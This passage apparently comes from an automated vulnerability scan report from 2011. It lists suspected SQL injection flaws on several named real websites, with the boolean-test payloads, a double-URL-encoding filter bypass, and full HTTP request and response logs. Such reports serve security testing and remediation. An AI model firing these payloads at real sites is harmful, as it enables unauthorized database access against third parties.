heWriteAbsoluteBrowserAwareStyleSheetLink('main_knowledge','http://assets%d.helium.com',tagOptions415) </script>
<script>var tagOptions656 = new Object();
tagOptions656.rel = 'Stylesheet';
tagOptions656.type = 'text/css';
tagOptions656.media = 'print';
heWriteAbsoluteBrowserAwareStyleSheetLink('print_knowledge','http://assets%d.helium.com',tagOptions656) </script>
<script>var tagOptions381 = new Object();
heWriteAbsoluteJavaScriptTag('adcode.js','http://assets%d.helium.com',tagOptions381) </script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8925353227623969");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleUseIframeRendering();
</script>

<script type="text/javascript">
var HELAD_url_part_1 = "server-status?119769932'%20or%201%3d1--%20=1";
var HELAD_url_part_2 = "";
var adparams = new AdSales_pagesetup();
adparams.setPageName("cms_index");
</script>

</head>
<body>


<div id="bigWrapper">


<!-- google_ad_section_start(name=nav, weight=0.0) -->

<div id="topNav" class="noRelated">


   <div id="utilityNav">
<ul class="none">
<li><a href="http://video.helium.com" target="_top">Videos</a> |</li>

<li><a href="http://howto.helium.com" target="_top">How To Guides</a> |</li>
<li><a href="http://www.helium.com/content/helium-community" target="_top">Community</a></li>
</ul>
   
    <span id="loginStatus">
       
   
<a href="http://www.helium.com/users/my_account">My Helium</a> | <a href="http://www.helium.com/registration/signup" target="_top">Join</a> | <a href="http://www.helium.com/login?after_login=my_helium" target="_top">Log in</a>


...[SNIP]...

Request 2

GET /server-status?119769932'%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helium.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Mongrel 1.1.3
Status: 404
Cache-Control: no-cache, max-age=3600
Content-Type: text/html; charset=utf-8
Content-Length: 14609
Set-Cookie: _helium_session=5edca78971d521c418cef18701baf2ba; path=/
Expires: Sat, 02 Apr 2011 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page Built: Sat Apr 02 02:56:07 +0000 2011 -->
<html xmlns="http:
...[SNIP]...
<script>var tagOptions429 = new Object();
tagOptions429.rel = 'Stylesheet';
tagOptions429.type = 'text/css';
tagOptions429.media = 'screen, projection';
heWriteAbsoluteBrowserAwareStyleSheetLink('main_knowledge','http://assets%d.helium.com',tagOptions429) </script>
<script>var tagOptions0 = new Object();
tagOptions0.rel = 'Stylesheet';
tagOptions0.type = 'text/css';
tagOptions0.media = 'print';
heWriteAbsoluteBrowserAwareStyleSheetLink('print_knowledge','http://assets%d.helium.com',tagOptions0) </script>
<script>var tagOptions195 = new Object();
heWriteAbsoluteJavaScriptTag('adcode.js','http://assets%d.helium.com',tagOptions195) </script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8925353227623969");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleUseIframeRendering();
</script>

<script type="text/javascript">
var HELAD_url_part_1 = "server-status?119769932'%20or%201%3d2--%20=1";
var HELAD_url_part_2 = "";
var adparams = new AdSales_pagesetup();
adparams.setPageName("cms_index");
</script>

</head>
<body>


<div id="bigWrapper">


<!-- google_ad_section_start(name=nav, weight=0.0) -->

<div id="topNav" class="noRelated">


   <div id="utilityNav">
<ul class="none">
<li><a href="http://video.helium.com" target="_top">Videos</a> |</li>

<li><a href="http://howto.helium.com" target="_top">How To Guides</a> |</li>
<li><a href="http://www.helium.com/content/helium-community" target="_top">Community</a></li>
</ul>
   
    <span id="loginStatus">
       
   
<a href="http://www.helium.com/users/my_account">My Helium</a> | <a href="http://www.helium.com/registration/signup" target="_top">Join</a> | <a href="http://www.helium.com/login?after_login=my_helium" target="_top">Log in</a>

       
...[SNIP]...

1.10. http://www.lyricsdepot.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lyricsdepot.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 53844502'%20or%201%3d1--%20 and 53844502'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status53844502'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 4212
Connection: close
Content-Type: text/html

<html>
<head>
<title>The Four Freshmen Lyrics</title>
<meta name=description content="The Four Freshmen Lyrics at the Lyrics Depot">
<meta name=keywords content="The Four Freshmen, lyrics, free, song lyrics">
<link rel="stylesheet" type="text/css" href="/site/inc/stylesheet.css">
<script language="javascript" src="/site/inc/scripts40.js"></script>
<script language="javascript"><!--
var artist = 'The Four Freshmen';
--></script>
</head>
<body bgcolor="#2060A0">

<center>
<table width="760" border="0" bgcolor="#004080" cellpadding="10" cellspacing="0">
<tr>
<td class="path">
Lyrics Depot
</td>
<td class="path" align="right">
<script language="javascript"><!--
middlead();
--></script>
</td>
</tr>
<tr>
<td colspan="2" width="760" bgcolor="#909090" align="center">
<script type="text/javascript"><!--
e9 = new Object();
e9.addBlockingCategories="Pop-under,Pop-up";
e9.size = "728x90,468x60";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/LyricsDepot/ROS/tags.js"></script>
</td>
</tr>
</table>
<table width="760" border="0" bgcolor="#004080" cellpadding="4" cellspacing="0">
<tr>
<td width="410" class="path">
<a href="http://www.lyricsdepot.com">Lyrics</a> &raquo; <b>The Four Freshmen Lyrics</b>
</td>
<form id="searchbox_016291345183668028587:91lghttsabu" action="http://www.lyricsdepot.com/searchresults.php">
<td width="350" class="path">
<span class="nobr">Find Song Lyrics: <input type="hidden" name="cx" value="016291345183668028587:91lghttsabu" /><input name="q" type="text" size="25" /> <input type="submit" name="sa" value="Search" /><input type="hidden" name="cof" value="FORID:11" /></span>
</td>
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_016291345183668028587%3A91lghttsabu"></script>

...[SNIP]...

Request 2

GET /server-status53844502'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:19:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 5160
Connection: close
Content-Type: text/html

doh<html>
<head>
<title>Lyrics Depot - Lyrics Not Found</title>
<link rel="stylesheet" type="text/css" href="/site/inc/stylesheet.css">
<script language="javascript" src="/site/inc/scripts40.js"></script>
</head>
<body bgcolor="#2060A0">

<center>
<table width="760" border="0" bgcolor="#004080" cellpadding="10" cellspacing="0">
<tr>
<td class="path">
LyricsDepot.com - Music Song Lyrics Archive
</td>
</tr>
<tr>
<td width="760" bgcolor="#909090" align="center">
<script type="text/javascript"><!--
e9 = new Object();
e9.addBlockingCategories="Pop-under,Pop-up";
e9.size = "728x90,468x60";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/LyricsDepot/ROS/tags.js"></script>
</td>
</tr>
</table>
<table width="760" border="0" bgcolor="#004080" cellpadding="4" cellspacing="0">
<tr>
<td width="410" class="path">
Your #1 source for song lyrics!
</td>
<form id="searchbox_016291345183668028587:91lghttsabu" action="http://www.lyricsdepot.com/searchresults.php">
<td width="350" class="path">
<span class="nobr">Find Song Lyrics: <input type="hidden" name="cx" value="016291345183668028587:91lghttsabu" /><input name="q" type="text" size="25" /> <input type="submit" name="sa" value="Search" /><input type="hidden" name="cof" value="FORID:11" /></span>
</td>
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_016291345183668028587%3A91lghttsabu"></script>
</tr>
</table>
<table width="760" border="0" bgcolor="#C0C0C0" cellpadding="10" cellspacing="0">
<tr>
<td valign="top" bgcolor="#909090" class="menu" width="140">
<p><b>Link to Us</b><br>
Webmasters! Like this song? <a href="javascript:addLink('Lyrics+Depot','http://www.lyricsdepot.com')">Add a link</a> to our site.
<p><b>Bookmark</b><br>
Like the sit
...[SNIP]...

1.11. http://www.newsweek.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.newsweek.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 55974988%20or%201%3d1--%20 and 55974988%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?155974988%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsweek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Age: 0
Cache-Control: max-age=120
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:47:04 GMT
Expires: Sat, 02 Apr 2011 02:49:04 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 1753611622
Content-Length: 4028
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.newsweek.com</h1>

<dl><dt>Server Version: Apache/2.2.8
...[SNIP]...
<dt>Server Built: Jun 18 2010 11:00:02
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 02-Apr-2011 02:47:04 UTC</dt>
<dt>Restart Time: Friday, 18-Feb-2011 18:54:38 UTC</dt>
<dt>Parent Server Generation: 6</dt>
<dt>Server uptime: 42 days 7 hours 52 minutes 25 seconds</dt>
<dt>3 requests currently being processed, 72 idle workers</dt>
</dl><pre>______________W______K___.......................................
_________________________.......................................
____________________K____.......................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process</p>
<p />
PID Key: <br />
<pre>
9234 in state: _ , 9234 in state: _ , 9234 in state: _
923
...[SNIP]...

Request 2

GET /server-status?155974988%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsweek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Age: 0
Cache-Control: max-age=120
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:47:04 GMT
Expires: Sat, 02 Apr 2011 02:49:04 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 1753611626
Content-Length: 4078
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.newsweek.com</h1>

<dl><dt>Server Version: Apache/2.2.8
...[SNIP]...
<dt>Server Built: Mar 9 2010 20:42:14
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 02-Apr-2011 02:47:04 UTC</dt>
<dt>Restart Time: Friday, 18-Feb-2011 18:54:09 UTC</dt>
<dt>Parent Server Generation: 6</dt>
<dt>Server uptime: 42 days 7 hours 52 minutes 54 seconds</dt>
<dt>4 requests currently being processed, 71 idle workers</dt>
</dl><pre>_______KK__________K_____.......................................
_________________________.......................................
................................................................
___W_____________________.......................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process</p>
<p />
PID Key: <br />
<pre>
27905 in state: _ , 27905 in state: _ , 27905 in state: _

...[SNIP]...

1.12. http://www.qwickstep.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.qwickstep.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /server-status%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qwickstep.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 00:14:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie
Content-Length: 28254

<html>
<head>
   <title>QwickStep Answers Search Engine</title>
   <meta name="keywords" value="">
   <meta name="description" value="QwickStep Answers Search Engine">
   <meta name="cpalead-verification" con
...[SNIP]...
<a href="/search/view-answer/why-postgresql.html" class="top-weight-1">
...[SNIP]...

1.13. http://www.smartertravel.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.smartertravel.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 61858445'%20or%201%3d1--%20 and 61858445'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status61858445'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:54 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=f82e9fa182547509f84a4f1f0c8a14823c1bbf7517bd0e0298a9baacf9d35cd769c0f74c8ddce822a9f3d235f76d2a8384ac7997b4dca7eecf7c290959a769f8; expires=Sun, 01-Apr-2012 02:21:54 GMT; path=/
Set-Cookie: vid=4d9688423d6c39.84045331; path=/; domain=.smartertravel.com
Set-Cookie: uu=7a21d162-badf-46e5-9505-dda26258daf7; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/1361859917?g=http%3A%2F%2Fwww.smartertravel.com%2Ferrordocs%2F404.php&amp;r=&amp;s.eVar37=1%7CI4&amp;s.channel=404+Error&amp;s.eVar24=404+Error&amp;s.pageType=errorPage&amp;s.server=app24&amp;s.eVar11=22&amp;s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->
</div>

<div id="outer_wrapper">

<div id="wrapper">
   <p class="hide"><a href="#top">Skip navigation</a></p>
<div id="masthead">
           <a href="http://www.smartertravel.com/">
           <img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="Cheap Airfare, Vacation Deals, Car Rental, and Discount Travel - SmarterTravel.com" />
       </a>
       <div class='search_wrapper'><div class='search'>
       <form method="get" action="http://www.smartertravel.com/search/" target="_top">
           <input type="text" class="search_text" name="q" value=""/> <input type="image" class="search_submit" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
       </form>
   </div></div>
   <div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
   <!-- <div class="survey_wrapper"><span class="obf href:$|d~$|i~0tvc0tvswfz/qiq@sfuvso>$|d~$|i~0tfswfs.tubuvt72969556(&31ps&312&4e2..&31@IUUQIPTU>$|i~" id="4d96884258ca3" >Join our survey panel</span></div> -->
</div>

<ul id="topnav_tabs">
<li id="st_home_page_tab" class="nav_tab"><a href="/" target="_top" rel="nofollow"><span>home</span></a><ul><li>&n
...[SNIP]...

Request 2

GET /server-status61858445'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:54 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=0d3cf84215c4b8a2a44b1d83d5a67dcc648387b449ecbac8670f031dc81b830a817581c669549fdb15b6091f43f06171959e9c6c6f48be1383dd4130c96755c2; expires=Sun, 01-Apr-2012 02:21:54 GMT; path=/
Set-Cookie: vid=4d968842733f73.09988363; path=/; domain=.smartertravel.com
Set-Cookie: uu=20839c2b-dfe9-46c5-bd8a-75604c445a31; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/268758348?g=http%3A%2F%2Fwww.smartertravel.com%2Ferrordocs%2F404.php&amp;r=&amp;s.eVar37=1%7CI4&amp;s.channel=404+Error&amp;s.eVar24=404+Error&amp;s.pageType=errorPage&amp;s.server=app24&amp;s.eVar11=22&amp;s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->
</div>

<div id="outer_wrapper">

<div id="wrapper">
   <p class="hide"><a href="#top">Skip navigation</a></p>
<div id="masthead">
           <a href="http://www.smartertravel.com/">
           <img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="Cheap Airfare, Vacation Deals, Car Rental, and Discount Travel - SmarterTravel.com" />
       </a>
       <div class='search_wrapper'><div class='search'>
       <form method="get" action="http://www.smartertravel.com/search/" target="_top">
           <input type="text" class="search_text" name="q" value=""/> <input type="image" class="search_submit" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
       </form>
   </div></div>
   <div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
   <!-- <div class="survey_wrapper"><span class="obf href:$|d~$|i~0tvc0tvswfz/qiq@sfuvso>$|d~$|i~0tfswfs.tubuvt72969556(&31ps&312&4e3..&31@IUUQIPTU>$|i~" id="4d96884290749" >Join our survey panel</span></div> -->
</div>

<ul id="topnav_tabs">
<li id="st_home_page_tab" class="nav_tab"><a href="/" target="_top" rel="nofollow"><span>home</span></a><ul><li>&nb
...[SNIP]...

1.14. http://www.tech-recipes.com/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-recipes.com
Path:   /server-info

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 18776569'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /server-info18776569'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-recipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:57:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://www.tech-recipes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 01:57:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://
...[SNIP]...
<a href="http://www.tech-recipes.com/category/database/" title="mysql, postgresql, oracle, tables, database,">
...[SNIP]...

1.15. http://www.tech-recipes.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-recipes.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 29838048'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /server-status29838048'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-recipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:32:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://www.tech-recipes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:32:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://
...[SNIP]...
<a href="http://www.tech-recipes.com/category/database/" title="mysql, postgresql, oracle, tables, database,">
...[SNIP]...

1.16. http://www.travelscream.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.travelscream.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelscream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:47:02 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n22 ( iad-agg-n12), ms iad-agg-n12 ( origin)
ETag: "6a1aeb994e58cb1:0"
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 02:47:02 GMT
Age: 0
Content-Type: text/html
Last-Modified: Sun, 19 Sep 2010 23:01:32 GMT
Connection: keep-alive
Content-Length: 7796

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
   <head id="_ctl0_Head1"><title>
Travelscream - Error
</title><
...[SNIP]...

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelscream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:47:02 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n22 ( iad-agg-n28), ms iad-agg-n28 ( origin>CONN)
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=1200
Expires: Sat, 02 Apr 2011 03:07:02 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 241770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...

1.17. http://www.usf.edu/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-info

Issue detail

